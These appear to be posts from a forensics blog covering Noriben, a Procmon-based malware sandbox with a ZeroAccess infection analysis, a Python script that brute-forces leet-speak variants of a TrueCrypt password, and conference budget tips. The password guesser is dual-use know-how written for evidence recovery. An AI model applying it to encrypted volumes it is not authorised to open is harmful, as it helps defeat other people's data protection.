Simply run Noriben and wait for it to set up. Once prompted, run your malware in another window. When the malware has reached a point of activity necessary for analysis, stop Noriben by pressing Ctrl-C. Noriben will then stop the logging, gather all of the data, and process a report for you. It then generates three files, all timestamped: a Procmon PML database, a text CSV document, and a text TXT file. The PML and CSV files constitute the main source of activity, with the TXT being the final report made after applying filters. Found too many false positives in your report? Simply delete the TXT file, add filters to Noriben.py directly, and rerun it with the "-r <filename>.csv" option to re-run analysis from the CSV.
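To give a feel for what re-processing the CSV with a filter list involves, here is a stripped-down sketch. It is not Noriben's actual code: the blacklist entries are hypothetical, and it assumes the exported CSV has a header row with a "Path" column.

```python
import csv
import io

# Hypothetical filter list; Noriben's real filters live inside Noriben.py.
PATH_BLACKLIST = ["\\Prefetch\\", "\\Windows\\Temp\\"]

def filter_events(csv_text, blacklist=PATH_BLACKLIST):
    """Yield CSV rows whose Path column contains none of the blacklisted substrings."""
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row.get("Path") or ""
        if not any(item.lower() in path.lower() for item in blacklist):
            yield row
```

Because the raw CSV is kept on disk, filters can be tightened or loosened and the report regenerated without having to detonate the malware again.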

Noriben - Origins


After many years in the Information Security industry, and training forensic investigators from every walk of life, I tend to hear the same complaints from most analysts. There is simply too much work to perform with not enough of a budget to purchase adequate tools. This is a growing concern for those in the malware analysis field, where the amount of malicious files comes in at a pace faster than most can keep up with.

To counter this problem, many organizations have found themselves putting a greater weight on automated tools. The industry targeting this particular segment has exploded in the past two years, with multiple large companies coming out with a large number of tools to help strained teams, but at large financial costs.

As a resourceful analyst of a small team, usually called to help out in surge support for others, I've had to find ways to work smarter with the tools I have. While setting up a Cuckoo sandbox server is a free and preferred method for quick analysis, I needed something more nimble and portable. This issue came up when I assisted on a response and was given a laptop upon arrival, one that lacked most basic malware tools. Working alongside a team of junior analysts, we had a large mountain of files to analyze, with no ready access to the Internet to analyze files quickly. The answer came with using simple tools already on the network, used by the system administrators, namely Sysinternals Procmon. Procmon is already in the arsenal of most malware analysts as a way to monitor system activity during dynamic analysis. By using native functionality within Procmon, a comma-delimited (CSV) file can be generated, which was then analyzed through specifically tailored grep searches. That effort turned into a way of automating the process to be used by dozens of people. After months of personal usage and testing, the end result was Noriben.

Noriben in Action


In my last blog post, I showed one of my recent tools for parsing Java IDX files, a forensic byproduct of Java-based malware infections. In that post we talked about the first-stage malware attack which was used solely to drop a file named hehda.exe to the user's Temporary folder. What was that executable and what does it do? Let's turn to Noriben:


Place your Noriben files (Noriben.py, procmon.exe, and optionally ProcmonConfiguration.pmc) into any standard Windows virtual machine. Then copy your malware to the VM.
Run Noriben and you will receive the following text:




After a while I see the original malware file, hehda.exe, disappear from my desktop. I wait about a minute and then press Ctrl-C to stop the scan. The following text is then displayed:



Notepad then automatically opens the resulting text report, which shows a lot of data. It is available at the following link (because the output is so large):

Original Report

Now, this could be better. So, I adjust my filters by adding in the items that don't interest me. I do this on the fly with this instance of Noriben.py within the VM, knowing that the changes are particular to this VM and that the new filters will be erased when I revert my snapshot. I then rescan my file by using "Noriben.py -r", as shown below:



The resulting report is much easier to process:

Filtered Report

From this, we can see a few items of high notability. The processes show Hehda.exe being executed, and then spawning cmd.exe:

[CreateProcess] Explorer.EXE:1432 > "C:\Documents and Settings\Administrator\Desktop\hehda.exe" [Child PID: 2520]
[CreateProcess] hehda.exe:2520 > "C:\WINDOWS\system32\cmd.exe" [Child PID: 3444]

By following cmd.exe's PID, we can see it is later responsible for deleting hehda.exe.
Hehda.exe drops a few very interesting files, including:

[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n  [MD5: cfaddbb43ba973f8d15d7d2e50c63476]
[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-18\$fab110457830839344b58457ddd1f357\n [MD5: cfaddbb43ba973f8d15d7d2e50c63476]

Right away, a Google search on this MD5 value returns many interesting results that tell us that the file was virus scanned as ZeroAccess. The filenames themselves are also indicative of ZeroAccess.
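If you want to pull the hashes out of a report for bulk searching, the line format shown above is regular enough for a small parser. This sketch is based only on the sample lines in this post; the regular expression and function names are mine, and other report lines may need adjustments.

```python
import re

# [Action] process:pid > target, optionally followed by [MD5: <32 hex chars>]
EVENT = re.compile(
    r"^\[(?P<action>\w+)\] (?P<process>[^:]+):(?P<pid>\d+) > (?P<target>.*?)"
    r"(?:\s+\[MD5: (?P<md5>[0-9a-f]{32})\])?$"
)

def parse_event(line):
    """Split one report line into its fields, or return None if it does not match."""
    match = EVENT.match(line.strip())
    return match.groupdict() if match else None

def unique_md5s(lines):
    """Collect the distinct MD5 values found across report lines."""
    events = (parse_event(line) for line in lines)
    return sorted({e["md5"] for e in events if e and e["md5"]})
```

Running `unique_md5s()` over the two CreateFile lines above returns a single hash, which makes it obvious that both dropped files are the same binary.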

How did this file gain persistence on the victim machine? Now that we see the files, we can peruse the registry values and see the following items:

[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel  =  Both
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default)  =  C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.

And what other damage did it do? Well, it looks like it took out a few notable services, including those for the Windows Firewall (SharedAccess) and Windows Security Center (wscsvc), by setting each service's Start value to 4 (disabled):

[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\Start  =  4
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\Start  =  4

That is one nasty piece of work. But, it gets better when we get down to the network traffic:

[UDP] hehda.exe:2520 > google-public-dns-a.google.com:53
[UDP] google-public-dns-a.google.com:53 > hehda.exe:2520
[HTTP] hehda.exe:2520 > 50.22.196.70-static.reverse.softlayer.com:80
[TCP] 50.22.196.70-static.reverse.softlayer.com:80 > hehda.exe:2520
[UDP] hehda.exe:2520 > 83.133.123.20:53
[UDP] svchost.exe:1032 > 239.255.255.250:1900
[UDP] services.exe:680 > 206.254.253.254:16471
[UDP] services.exe:680 > 190.254.253.254:16471
[UDP] services.exe:680 > 182.254.253.254:16471
[UDP] services.exe:680 > 180.254.253.254:16471
[UDP] services.exe:680 > 135.254.253.254:16471
[UDP] services.exe:680 > 134.254.253.254:16471
[UDP] services.exe:680 > 117.254.253.254:16471
[UDP] services.exe:680 > 115.254.253.254:16471
[UDP] services.exe:680 > 92.254.253.254:16471
[UDP] services.exe:680 > 88.254.253.254.dynamic.ttnet.com.tr:16471
[UDP] services.exe:680 > 254.253.254.87.dynamic.monaco.mc:16471


The large list of IP addresses contacted on UDP port 16471 is another big indicator for ZeroAccess. Upon doing open research, you'll find that the dropped file "@" is a list of IP addresses used to bootstrap the malware onto the botnet network. Additionally, we see a request to "50.22.196.70-static.reverse.softlayer.com", the known host for the MaxMind geolocation service API, giving the botnet owners a sense of where in the world your computer lies.
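A quick way to make a pattern like the port 16471 burst jump out is to count destination ports per process. The sketch below does that for network lines in the format shown above; the regular expression and function name are mine, not part of Noriben.

```python
import re
from collections import Counter

# [PROTO] source:port > destination:port
NET_EVENT = re.compile(r"^\[(UDP|TCP|HTTP)\] (\S+):(\d+) > (\S+):(\d+)$")

def outbound_port_counts(lines, process):
    """Count (protocol, destination port) pairs for traffic sent by the named process."""
    counts = Counter()
    for line in lines:
        match = NET_EVENT.match(line.strip())
        if match and match.group(2) == process:
            counts[(match.group(1), int(match.group(5)))] += 1
    return counts
```

Calling `outbound_port_counts(report_lines, "services.exe").most_common()` puts the heaviest port at the top, which is also a handy starting point for a network block rule.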

Conclusions / Post Analysis Mitigation


The goal of Noriben is to provide very quick and simple answers to your questions, whether to support a more in-depth analysis of an infected system, to better understand a malware sample's capabilities without static analysis, or to quickly craft network filters to look for (and block) other infections. What files were created? What MD5s should I scan for? What network hosts and ports are being used? The pure text report allows you to quickly see data and copy/paste it to a relevant solution.

Noriben is not a turn-key solution. While the built-in filters will remove most innocuous items, the user will likely need to adjust and add new filters to remove additional benign entries. It's highly recommended to run Noriben in your VM alongside benign applications, then modify the built-in filters to match your particular operating system. Editing is extremely easy: open Noriben.py in any text editor and add new items to the respective black list.

Noriben is hosted on GitHub

P.S. Why call it Noriben? Noriben (海苔弁) is a very simple Japanese lunch box. Noriben are plentiful in shops, provide your basic nourishment, and are a staple meal for a struggling family. It felt only appropriate to analogize it to Noriben.py, a very simple sand box that provides basic indicators, can directly feed your security solutions, and fits easily within the budget of any organization.

P.P.S. If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.
1 May 13: Rewritten to be forward compatible to Python 3.X. Works in both versions of Python now.
30 Apr 13: Regular Expression support implemented and working.
17 Apr 13: Major bug fixes in filters. Now dramatically reduces false positives.
16 Sep 13: Version 1.4 now lets you specify the malware on the cmdline and specify a timeout period to be more sandbox-like. It also has the feature of generalizing path to their relative environment variable. More on that here.

Noriben version 1.1 Released

I've made available the latest version of Noriben with some much-needed updates.

The greatest update is a series of added filters that dramatically help to reduce false positive items in the output. This was missing from the first release due to an oversight on my part, and an unknown usability feature in Procmon. I use my own personal Procmon filters for malware analysis, which are not provided for users to download. The mistake was that I was under the assumption that removing this filter file would prevent Procmon from using them and would provide me the output that everyone else would see. That was a wrong assumption; Procmon stores a backup in the registry.

After seeing the output produced when @TekDefense ran Noriben, I quickly realized the sheer amount of items that should not be in the report, and rushed to fix this.

While updating the filters, I applied a few new improvements under the hood in how filters were applied. Primarily, filters now support regular expressions, though I have not implemented any at this point. Additionally, filters can now include environment variables. So, instead of hard-coding "C:\Users\Brian\AppData\...", which would change on every single machine, a filter can read "%UserProfile%\AppData\...". This lends to greater portability of the script, allowing it to use the same filter set on any machine with no changes.
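As a rough illustration of the environment-variable idea (not the code Noriben actually uses), a filter containing `%Name%` markers can be expanded before it is compared against a path. The helper names `expand_filter` and `is_filtered` are hypothetical, and the environment is passed in as a plain dictionary so the example behaves the same on any machine; in practice you would likely hand it `os.environ`.

```python
import re

def expand_filter(pattern, environment):
    """Replace %Name% markers in a filter with values from environment."""
    lookup = {name.lower(): value for name, value in environment.items()}

    def substitute(match):
        # Leave unknown markers untouched so a typo in a filter stays visible.
        return lookup.get(match.group(1).lower(), match.group(0))

    return re.sub(r"%([^%\\]+)%", substitute, pattern)

def is_filtered(path, filters, environment):
    """True if path starts with any expanded filter (case-insensitive, as on Windows)."""
    path = path.lower()
    return any(path.startswith(expand_filter(f, environment).lower()) for f in filters)

env = {"UserProfile": r"C:\Users\Brian"}
filters = [r"%UserProfile%\AppData"]
print(expand_filter(filters[0], env))
print(is_filtered(r"C:\Users\Brian\AppData\Local\Temp\x.tmp", filters, env))
print(is_filtered(r"C:\RECYCLER\n", filters, env))
```

Because the filter text never names a specific user, the same list works unchanged on another analyst's VM.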

The new version of Noriben, version 1.1, is available on GitHub here.

If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.


Update (30 Apr 13): I made a gross failure in testing the Regular Expression feature in version 1.1. In short, it didn't work. That's been rectified, and it's working perfectly. I also added some rules on how to create new rules, to meet the requirements of the regular expression parser.

Ghetto Forensics!

While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate. For every security team operating under a virtually unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum, a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and tried each result as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and Twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used a free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but what data do I need and how do I extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Presentation Archive


Below are a series of presentations I've given over the years, though not a fully inclusive list. Many are too sensitive (FOUO/LES/S/TS/SAP/EIEIO) to store, and others have been lost to digital decay. But, the remainder have been recovered and digitally remastered for your enjoyment.

Walking the Green Mile: How to Get Fired After a Security Incident:

Abstract: Security incidents targeting corporations are occurring on a daily basis. While we may hear about the large cases in the news, network and security administrators from smaller organizations quake in fear of losing their jobs after a successful attack on their network. Simple bad decisions and stupid mistakes in responding to a data breach or network intrusion are a great way to find yourself new employment. In this talk I'll show you in twelve easy steps how to do so after, or even during, a security incident in your company.
Notable Venues: Derbycon 1.0, Defcon Skytalks, BSides Las Vegas


Below is a video feed of the talk given at the first ever Derbycon. It was an early morning slot, and I was somehow blissfully unaware that I was being recorded, which may be why I feel it was the best recording of the talk.



Intelligence Gathering Over Twitter:

This was a basic-level presentation geared for a law enforcement audience. It taught the basics of how to use Twitter but also delved into specialized tools to collect and analyze large amounts of data, to help infer relationships and associations. This slide deck is slightly redacted, as much of the good stuff was given orally in the presentation.
Notable Venues: DoD Cyber Crime Conference


Information Gathering Over Twitter from Brian Baskin

Malware Analysis: Java Bytecode

Abstract: This was a short talk given to NoVA Hackers soon after working through a Zeus-related incident response. The Javascript used to drop Zeus on the box had a few layers of obfuscation that I had not seen discussed publicly on the Internet. This was originally given unrecorded and only published a year later.



P2P Forensics: 

Abstract: Years ago I began working on an in-depth protocol analysis talk about BitTorrent so that traffic could be monitored. This grew into a BitTorrent forensics talk which grew into an overall P2P Forensics talk. At one point, it was a large two-hour presentation that I had to gently trim down to an hour. Given at multiple venues, each was modified to meet that particular audience (administrators, criminal prosecutors, military).
Notable Venues: GFIRST, DoD Cyber Crime Conference, DojoCon, Virginia State Police Cyber Workshop, USAF ISR Information Security Conference, USDoJ CCIPS Briefing, AFOSI Computer Crime Workshop



The only video recording of the talk, recorded at DojoCon 2010, for a technical audience.

Brian Baskin, @bbaskin P2P Forensics from Adrian Crenshaw on Vimeo.


Casual Cyber Crime:

Abstract: We're living in an age of devices and applications that push the boundaries of dreams, an age of instant gratification, but also the age of Digital Rights Management and Copyright laws. With questionably illegal modifications becoming simple enough for children to use, where does the line get drawn between squeezing more functionality out of your digital devices and software and breaking felony laws? In this talk attendees will explore the justifications and rationales behind the use of questionable hardware and software modifications and understand the mentality behind why their use is rapidly catching on in the general population.
Notable Venues: TechnoForensics



31337 Password Guessing

In digital forensics and incident response, we tend to deal with encrypted containers on a regular basis. Encrypted containers mean dealing with various styles and iterations of the passwords used to access them. In a large-scale incident response, it's not uncommon to have a dedicated spreadsheet that just maintains what passwords open what volumes, with the spreadsheet itself password protected.

But, what happens when you forget that password?



The common problems I've run into have been trying to access a volume months, sometimes years, after the fact. In civil cases, we've been surprised to see a case resurface years after we thought it had been settled, and rushed back to open old archives. This inevitably leaves us asking "Did I use a zero or an `O` for that byte?"

By making a spreadsheet of every possible password permutation, we've always been able to get to the data, but the issue does occasionally pop up.

For instance, in an intrusion-related case, a case agent used their agency's forensics group to seize a laptop drive. The drive contained a user file encrypted with TrueCrypt. Through the telephone-game, the owner says the password is XooXooX, which the responder writes as xooxoox, which is transcribed by the case agent as X00x00x. Attempts to decrypt the volume fail, and being that the original responder has now moved on and no notes were kept, all we're told is that the password is "something like ....".

Reasonable and resourceful shops would then write custom password filters to throw into software like PRTK, using DNA clustering to quickly determine the password. However, you don't work in a reasonable and resourceful shop. You can't afford PRTK. What do you do? Write a password guesser in Python that just uses TrueCrypt.




TrueCrypt has a variety of command-line arguments to automatically mount images given a specified password:


With these in mind, we can craft a command-line argument to mount the volume, and rely upon TrueCrypt's return code (0 or 1) to tell us if the mount was successful or not.

Take the case of an agent who says: "The password is Volleyball. We know the first letter is capitalized, and the rest is in leet speak." Based on this, I write a leet-speak character substitution routine:


    def leet_lookup(char):
        # Known leet-speak substitutions for each letter.
        substitutions = {"a": ["a", "A", "@"],
                         "b": ["b", "B", "8"],
                         "c": ["c", "C", "<"],
                         "e": ["e", "E", "3"],
                         "i": ["i", "I", "1"],
                         "l": ["l", "L", "1"],
                         "o": ["o", "O", "0"],
                         "t": ["t", "T", "7"]}
        try:
            result = substitutions[char.lower()]
        except KeyError:
            # No entry: fall back to the lower and upper case forms.
            result = [char.lower(), char.upper()]
        return result


This little routine lets us create a list of possible substitutions for each byte value. If the specified byte isn't declared, it just returns the upper and lower case version of it.

Now, we put this into action here:

    from __future__ import print_function  # print() works on Python 2 and 3

    import subprocess
    import sys

    tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"
    tc_file = "E:\\test.tlc"
    drive_letter = "P"

    def leet_lookup(char):
        # Known leet-speak substitutions for each letter.
        substitutions = {"a": ["a", "A", "@"],
                         "b": ["b", "B", "8"],
                         "c": ["c", "C", "<"],
                         "e": ["e", "E", "3"],
                         "i": ["i", "I", "1"],
                         "l": ["l", "L", "1"],
                         "o": ["o", "O", "0"],
                         "t": ["t", "T", "7"]}
        try:
            result = substitutions[char.lower()]
        except KeyError:
            # No entry: fall back to the lower and upper case forms.
            result = [char.lower(), char.upper()]
        return result

    passwords = []
    # V o l l e y b a l l = 10 chars
    for c1 in leet_lookup('v'):
        for c2 in leet_lookup('o'):
            for c3 in leet_lookup('l'):
                for c4 in leet_lookup('l'):
                    for c5 in leet_lookup('e'):
                        for c6 in leet_lookup('y'):
                            for c7 in leet_lookup('b'):
                                for c8 in leet_lookup('a'):
                                    for c9 in leet_lookup('l'):
                                        for c10 in leet_lookup('l'):
                                            passwords.append("%s%s%s%s%s%s%s%s%s%s" % (c1, c2, c3, c4, c5, c6, c7, c8, c9, c10))
    print("%d passwords calculated. Now testing:" % len(passwords))

    count = 0
    for password in passwords:
        count += 1
        # Progress indicator: one dot for every 10 attempts.
        if not count % 10:
            print(".", end=" ")
        # Passing a list avoids quoting problems with the space in "Program Files".
        tc_cmdline = [tc_exe, tc_file, "/l", drive_letter, "/b", "/a", "/m", "ro", "/q", "/s", "/p", password]
        returncode = subprocess.Popen(tc_cmdline).wait()
        # A return code of 0 means the mount succeeded.
        if not returncode:
            # Dismount the volume again before reporting the password.
            close_cmdline = [tc_exe, "/d", "/l", drive_letter, "/q", "/s"]
            subprocess.Popen(close_cmdline).wait()
            print("\r\nPassword found: %s" % password)
            sys.exit()

The main portion is where we specify the 10 characters of Volleyball (which I'm sure could be written cleaner with a Python lambda, but ain't nobody got time for that). This script will try every permutation of Volleyball against a file named "E:\test.tlc", mounting it to drive letter "P:" if successful.
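For anyone who does have the time, one way to collapse the ten nested loops is `itertools.product` rather than a lambda. This is a sketch of an alternative, not the code from the script above; `candidates` is a hypothetical helper name, and the substitution table is copied from `leet_lookup`.

```python
import itertools

# Same substitution table as leet_lookup in the script above.
LEET = {"a": ["a", "A", "@"],
        "b": ["b", "B", "8"],
        "c": ["c", "C", "<"],
        "e": ["e", "E", "3"],
        "i": ["i", "I", "1"],
        "l": ["l", "L", "1"],
        "o": ["o", "O", "0"],
        "t": ["t", "T", "7"]}

def leet_lookup(char):
    # Unknown characters fall back to their lower and upper case forms.
    return LEET.get(char.lower(), [char.lower(), char.upper()])

def candidates(word):
    """Return every combination of substitutions for word, any length."""
    options = [leet_lookup(c) for c in word]
    return ["".join(combo) for combo in itertools.product(*options)]

passwords = candidates("volleyball")
print(len(passwords))  # 26244
```

The list comes out in the same order as the nested loops produce it, and the same function handles a base word of any length without adding or removing loops.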


In action, there were 26,244 possible permutations of the password, with a dot written for every 10 tests. After 30 minutes of testing, the correct one was found to be:  V0ll3ybal1



A copy of this code can be found as a GitHub Gist at: https://gist.github.com/Rurik/5521081

Additionally, the same concept can be applied to other products, such as password-protected RAR or ZIP archives.
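As a rough sketch of the ZIP case, assuming Python 3 and its standard `zipfile` module (which can decrypt only the legacy ZIP encryption scheme, not AES-encrypted archives), the same candidate list can be thrown at an archive. `find_zip_password` is a hypothetical helper, and RAR would need a third-party tool instead.

```python
import zipfile
import zlib

def find_zip_password(zip_path, candidates):
    """Return the first candidate that decrypts the archive's first member, else None."""
    with zipfile.ZipFile(zip_path) as archive:
        first_member = archive.namelist()[0]
        for password in candidates:
            try:
                # read() decrypts and CRC-checks the member; a wrong password raises.
                archive.read(first_member, pwd=password.encode("utf-8"))
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                continue
            return password
    return None
```

A call would look like `find_zip_password("evidence.zip", passwords)`, where the file name is a placeholder and `passwords` is a list of guesses such as the one generated for the TrueCrypt volume.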

How to Attend Conferences On A Budget (Part One)

Cons, they are the ultimate thrill ride for many in the Information Security business. A chance to get away from work for a week, to drink heavily and listen to talks, to try and get an eyeful of your favorite InfoSec Rockstar as they hang out with other rockstars in the hotel lobby.

As many industries have learned over the past decade, conferences are big business, and a life cycle in and of itself in the industry. Speakers get paid to talk at conferences, sharing new ideas while also advertising for their employers. The masses flock to hear what a speaker says, using a company's allotted training budget. Conference attendance helps build an employee's experience and provides for Continuing Professional Education (CPE) points that apply to contract-mandated certifications. Knowing that such masses are gathered in one spot, large organizations shell out tens of thousands of dollars to sponsor and add their own pieces of flair to a designated conference under their advertising budget.

It's a win-win-win for everyone, and works at every financial scale of the industry. Grass roots conferences work at extremely limited budgets, while hundreds of thousands of dollars flow around Black Hat events where registration and training at Black Hat Las Vegas could set your company back $5,000.

And then... there's you. Fighting the crushing blow of continuous work cycles, not enough resources to even get an hour off for dental work, and no training budget to speak of. Working in the trenches, how do you get to experience this lifestyle and still make your numbers work?




Conference Proposal:
Your primary solution to attend conferences is to provide the perfect pitch, in the form of a conference proposal. This is done either to your immediate management, your client, or to your significant other. Treat this as a Risk Analysis report, where your company and/or team may suffer from an immediate computer-related risk due to you not being able to attend. As with all Risk Analysis reports, you will have to keep a fine balance between costs and the return on investment.

Attendance will likely mean some sort of sacrifice on your part. Don't expect a full ride at first; be prepared to float most of the costs. Since we're likely working on a personal budget, as well as a miserly corporate one, we'll need to source budget-friendly methods of attending.

Step One: Pick Your Conference

When asked about a prominent security conference, the top responses are usually Black Hat Vegas, RSA, DEFCON, or one of the SANS conferences.

What people fail to realize is that there are literally hundreds of security conferences, occurring year-round across the globe. It's often said that you can't go a single week without seeing news of a con, an issue that has been highly lampooned by others. But, there's no doubt that there is a conference that's ripe for educational pillaging in your neck of the woods.

Working in Ghetto Forensics, we need to focus first on our cheaper conferences so that we can build up the ammunition required for justification to the big ones. How do you find these conferences? Sites such as SECore (the SECurity Organizer and Reporter Exchange) track the various types of conferences, grouping them by industry, region, and cost.


Security BSides

A casual perusal of SECore's immense database will show you a large number of "BSides" events. Security BSides started as a grassroots movement to empower up-starts to produce their own professional information security conference with little risk. Recognizing the potential for information sharing by providing a low-cost conference alternative to the big names, BSides events have popped up across the globe, some selling out within hours. Volunteer-run and managed, BSides conferences are often more relaxed and informal than professional conferences, in intimate environments that allow you to easily buy a beer for your favorite speaker and ask questions on how to apply their ideas to your environment. And, most important of all, BSides events are free to attend.

Conference costs:
After finding a conference within your region, evaluate the sticker shock of the conference and logistics. A conference registration under $250 will likely require little negotiating for approval. A free conference will probably require none at all. This will vary per environment: if you typically have to fight to get valid licenses for just Windows and Word, you may want to stick to the free conferences. Remember your Risk Analysis; you will want to provide a number that won't immediately cause a refusal by management.

It is entirely possible to reduce, or skip, registration costs altogether. Many conferences have early bird specials where registration is reduced greatly months in advance. Others provide promotional codes to local companies or user groups to garner local attention. When a conference is in your town, being a member of a local security group, or Linux User Group, could pay dividends.

One can always generically search for promotional codes, a standard tactic for savvy web shoppers for years. Using sites like RetailMeNot, it's amazing what you may find...

For cons that are just completely out of your price range, or are already sold out, a possible way to attend could be to volunteer. This is especially useful at BSides events, where most functions are managed by volunteers. For professional conferences, however, you'll find that all of these tasks are managed by an event management company. It doesn't hurt to ask.

SANS conferences have a fair compromise for many attendees by offering a Work Study program. You can attend their training at a reduced rate of $900, but you will also be working 12+ hour days as a classroom helper and putting in a lot of effort to help make the class run.



"Time Off":
Time is one of the most critical items to your employer. Most will balk at paying an employee to spend three days away, so expect to use personal time (PTO) to cover your time at first. Don't worry, the goal is to eventually get your time paid for while in attendance, but it takes effort to get there. Many conferences are weekend-based, or at least Friday/Saturday, so there are often only a few hours to make up on client-site to be able to attend.

If using PTO is out of the question, inquire about front-loading your hours (working 4-10's) or making time up on another day.



Travel Costs:
Oftentimes, the most expensive portion of a conference is the logistics of attending it, such as airfare and hotel lodging. These expenses are easily forgotten during conference planning and can cause issues, especially as airline costs rise as the conference date approaches. It's important to plan early and monitor prices constantly.

Tracking airline costs has become easier in recent years. Kayak.com allows you to search for a flight across multiple airlines, and also continually performs that search weekly to provide you updates as the costs increase or decrease:



Both Kayak and Bing Travel provide Cost Confidence metrics, providing insight on whether it's best to buy now or wait for a lower price:


Old adages of travel still apply: Never book flights near the weekends. Always wait until Tuesday or Wednesday to do your searches, the days when fares are cheapest. However, for your Conference Proposal you'll want to build in price slack. Quote a Friday price and buy on Tuesday.

Remember: Even if your company is paying, you will profit by putting in the elbow grease to ensure the cheapest costs.

Lodging Costs:
Hotels are often the largest expense for many conferences, but the costs are usually offset by a block-discount rate for attendees at the conference. While this group rate is definitely cheaper than the "on-site booking" price, it may not be the cheapest rate. Gather the rates, then search for all other rates available, which would include AAA and government rates.

Those on government travel often find the greatest deals with the per diem rate found at hotels. With travel orders or a government CAC (Common Access Card), one can register under the per diem rate. However, at times this may be more expensive than all other rates, especially in areas where there is a large military presence. Hotels know that govvy travel bookers automatically choose per diem rates, even when their standard hotel rate is cheaper.

Only twice in dozens of stays have I been asked to supply government ID (CAC) to receive the government rate, but keep your ID on you just in case.

Alternatively, you may choose to stay off-site at another hotel. This approach has its benefits and drawbacks. You may find a slightly lower-class hotel a block down the road for half the price, a great savings in exchange for a short walk.

The Hotel Next Door


For example, with DEFCON currently being held at the Rio in Las Vegas, attendees face a room rate of between $104-118 per night. However, just one block away is the Gold Coast where a standard night is between $34-60 for a room just as nice. Having stayed at the Gold Coast in 2012, I found zero lines for breakfast and lunch, a much quieter atmosphere, and a six-night stay cheaper than three days at the Rio.

Using services like Priceline.com or Hotwire.com, I've often received $45 rooms a few blocks away compared to the $150 conference rate. When staying for three nights, that's basically receiving two nights free. The major downside to this is that the chosen hotel may be too far away. At this past year's Shmoocon, Priceline put me at L'Enfant Plaza while the conference was held near Union Station. While only a 1.5-mile difference, the DC metro stops and walking mandated a 30-minute commute each way. Being offsite also limits your baggage, forcing you to leave the laptop behind or check it with a concierge.
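The "two nights free" figure is easy to sanity-check for your own trip before it goes into a proposal. The snippet below is just the arithmetic from the paragraph above; `nights_saved` is a hypothetical helper, and the rates are the $150 and $45 examples already quoted.

```python
def nights_saved(conference_rate, offsite_rate, nights):
    """Return (dollars saved, savings expressed in nights at the conference rate)."""
    savings = (conference_rate - offsite_rate) * nights
    return savings, savings / float(conference_rate)

savings, free_nights = nights_saved(150, 45, 3)
print("Saved $%d, or about %.1f nights at the conference rate" % (savings, free_nights))
# Saved $315, or about 2.1 nights at the conference rate
```

Swap in the rates you actually find to see whether the commute is worth the difference.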

Don't just blindly search for hotels, especially when using sites like Priceline. Resources such as BetterBidding.com can provide detailed hotel listings (at each star level). For example, RVASec is approaching with the preferred hotel being the Crowne Plaza Richmond Downtown at $112/night. Not a bad deal, but let's dig deeper; we may be able to get into the same hotel for a fraction of the price. A search on BetterBidding's hotel list for Richmond Downtown shows eight hotels downtown, that the preferred venue is a 3.5* hotel, and that there are two other hotels with the same rating:


We then take the addresses for these hotels and plot them in comparison to the venue and the conference hotel:


